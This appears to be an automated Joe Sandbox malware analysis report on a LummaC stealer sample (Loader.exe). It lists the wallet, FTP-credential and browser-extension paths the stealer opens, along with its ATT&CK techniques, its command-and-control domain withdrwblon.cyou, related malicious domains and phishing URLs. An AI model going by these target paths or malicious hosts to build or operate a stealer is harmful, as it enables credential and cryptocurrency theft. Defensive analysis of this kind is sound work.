Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DQOFHVHTMG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DUKNXICOZT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DUKNXICOZT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ERWQDBYZVW	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\WSHEJMDVQC	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ERWQDBYZVW	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\PWZOQIFCAN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\WSHEJMDVQC	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DQOFHVHTMG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\PWZOQIFCAN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ERWQDBYZVW	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\PWZOQIFCAN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\WSHEJMDVQC	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DUKNXICOZT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\WHZAGPPPLA	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\WSHEJMDVQC	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\WSHEJMDVQC	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DQOFHVHTMG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\DUKNXICOZT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ERWQDBYZVW	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\PWZOQIFCAN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\ERWQDBYZVW	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior

Source: Yara match	File source: 00000008.00000003.1329981970.00000000036A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 7388, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 7388, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	1 Masquerading	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	231 Security Software Discovery	Remote Desktop Protocol	41 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	131 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	131 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	11 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	33 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Loader.exe	55%	ReversingLabs	Win32.Trojan.Generic
Loader.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\msvcp110.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\msvcp110.dll	63%	ReversingLabs	Win32.Trojan.Tedy

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://crt.rootca1.amazontrust.com/rootca1.cer0?	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.all	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
withdrwblon.cyou	188.114.96.3	true	true		unknown
171.39.242.20.in-addr.arpa	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Reputation
mediavelk.sbs	true	unknown
definitib.sbs	true	unknown
strikebripm.sbs	true	unknown
elaboretib.sbs	true	unknown
https://withdrwblon.cyou/api	true	unknown
activedomest.sbs	true	unknown
ostracizez.sbs	true	unknown
withdrwblon.cyou	true	unknown
offybirhtdi.sbs	true	unknown
arenbootk.sbs	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://withdrwblon.cyou/w	aspnet_regiis.exe, 00000008.00000003.1373056224.0000000005950000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1391970997.0000000005955000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1373694057.0000000005950000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1373752411.0000000005953000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/chrome_newtab	aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://withdrwblon.cyou/Co	aspnet_regiis.exe, 00000008.00000003.1373852192.00000000036B1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1373768479.00000000036AF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://withdrwblon.cyou/apixi	aspnet_regiis.exe, 00000008.00000002.1424717867.0000000003653000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1423102544.0000000003653000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://withdrwblon.cyou/apie	aspnet_regiis.exe, 00000008.00000003.1329981970.00000000036A9000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://withdrwblon.cyou/apih	aspnet_regiis.exe, 00000008.00000003.1392151745.00000000036AD000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	aspnet_regiis.exe, 00000008.00000003.1352958066.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://withdrwblon.cyou/api(w	aspnet_regiis.exe, 00000008.00000003.1393784209.00000000036BD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1411298541.00000000036BF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1423519992.00000000036BF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1425008855.00000000036BF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://withdrwblon.cyou/	aspnet_regiis.exe, 00000008.00000003.1348659467.000000000594E000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1411298541.00000000036BF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1329981970.00000000036A9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1423102544.0000000003653000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1423075609.0000000005950000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1373752411.0000000005953000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1373823973.0000000005950000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://x1.c.lencr.org/0	aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://withdrwblon.cyou/x_	aspnet_regiis.exe, 00000008.00000002.1424717867.0000000003653000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1423102544.0000000003653000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://withdrwblon.cyou/apied	aspnet_regiis.exe, 00000008.00000003.1329981970.00000000036A9000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://withdrwblon.cyou:443/api	aspnet_regiis.exe, aspnet_regiis.exe, 00000008.00000003.1373768479.00000000036AF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.mozilla.org/products/firefoxgro.all	aspnet_regiis.exe, 00000008.00000003.1352958066.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://withdrwblon.cyou/apiqpv	aspnet_regiis.exe, 00000008.00000003.1348748371.0000000005958000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1348659467.000000000594E000.00000004.00000800.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	withdrwblon.cyou	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1541479
Start date and time:	2024-10-24 21:50:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Loader.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/2@2/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 94% Number of executed functions: 8 Number of non-executed functions: 76
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target aspnet_regiis.exe, PID 7388 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Loader.exe

Simulations

Behavior and APIs

Time	Type	Description
15:51:06	API Interceptor	7x Sleep call for process: aspnet_regiis.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	rPedidodecompra__PO20441__ARIMComponentes.exe	Get hash	malicious	Lokibot, PureLog Stealer, zgRAT	Browse	dddotx.shop/Mine/PWS/fre.php
	Orden de Compra No. 78986756565344657.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/nwtkd
	Doc 784-01965670.exe	Get hash	malicious	FormBook	Browse	www.launchdreamidea.xyz/bd77/
	PO1268931024 - Bank Slip.exe	Get hash	malicious	PureLog Stealer	Browse	www.timizoasisey.shop/3p0l/
	BL.exe	Get hash	malicious	FormBook	Browse	www.launchdreamidea.xyz/bd77/
	w49A5FG3yg.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	733812cm.n9shteam.in/DefaultWordpress.php
	9XHFe6y4Dj.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	733812cm.n9shteam.in/DefaultWordpress.php
	SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	t1zTzS9a3r.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	abdulbek.top/externalvideoprotectdefaultsqlWindowsdlePrivate.php
	aQdB62N7SB.elf	Get hash	malicious	Shikitega, Xmrig	Browse	main.dsn.ovh/dns/lovely

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://onlinepdf-qrsharedfile.com/index.html#XYW5uaWUua3lwcmlhbm91QGxjYXR0ZXJ0b24uY29t	Get hash	malicious	HTMLPhisher	Browse	104.16.123.96
	https://t.ly/8Lgfk	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	104.17.25.14
	phish_alert_sp2_2.0.0.0 (1).eml	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://view.flodesk.com/emails/671a6d1f7ce9f793bb70518a	Get hash	malicious	Unknown	Browse	104.18.18.100
	http://boulos-sharepoint.com	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	la.bot.mips.elf	Get hash	malicious	Unknown	Browse	8.40.143.15
	https://u47751895.ct.sendgrid.net/ls/click?upn=u001.LUpianUM71xe7PV7wDA6i1kcuy38W249FfPzE-2Fn4iGArrL0MQBCUZHFEzmfBrwW7hf5h8aNQUml0OSIHqpXf0Hd-2FwQBg2gsGxKHK7PsY2xc-3DPya1_YT5LbHmSQ6soq50ixwpFbSYZshuq6-2FPFgRa8NDnR03IYhL-2F9Rsp4maHC7HKUeszLncLvtZaWCVsMwsguQ5-2FbgriKbvHymTrFFrqjql1V0tvMkZQvyA1xxy-2B6NtGFoUeUGIrvdabsXN8enx2k5c-2BvLXzm-2BRXmD29Cf33DbXC513Cwkuo46G2I7a1uwsANH8eVhz8r5XyLPneRi4ngixWtQkBEaLBBKkl5CzEPySNlMnqJuuWiTBlFswgUf9EX-2BEhUpqAvMFuAlKTpYcteS-2FjAegbPmUSDcSeBkfnhL6yUhTFHUFrxra-2BdIgnamsXKUUqu-2BC45G51EOfBd9qOCqWy3OeOC7KYj3-2FcaIfcOAM1Jkvyddtn3gwRC5w97RLza-2BBM2JcZLNzMYva4SJzBZv7RClCaMcjevyjP6ZFvlR0NECf5zAmWbPLmCUnefze8ZyTvnDqXVb3nrflSdnTlNxWfm617xjOrSoSu-2BVHZVqbE92ZodSyvWqgaCWZg0TMDZeq64M67nuH9ryo7I5u80SS081vnMThCYiPoN3JUoUliQPKbNY46GxAPyVhMs4qqZVi-2FFUtIGEycXziXytxfy6JCzAZ2sa7DZusc1RftLAVM4uJit-2FAhxM-2FK1sEHsKHKvs9o7uDMExZ5YqEBjrD2XHch-2BY6xwRGGg56MeC1Bpa72xAoR6DmInmiEX4j92yaROEh1-2FMsHdtSstN7zc8gxU7ETVWVMBRLf6m4dTRruSfSNaLUi9QLq9d7Qfe8VMdKN1j9FMGIYia88728BDNNxRTaT4nSNITRr9JPa4Z1K1vdUocdyCKNcYSZsN8yguI0-2FqNXUfWFuoxnz5MDqwufLzxub8Fw-3D-3D	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
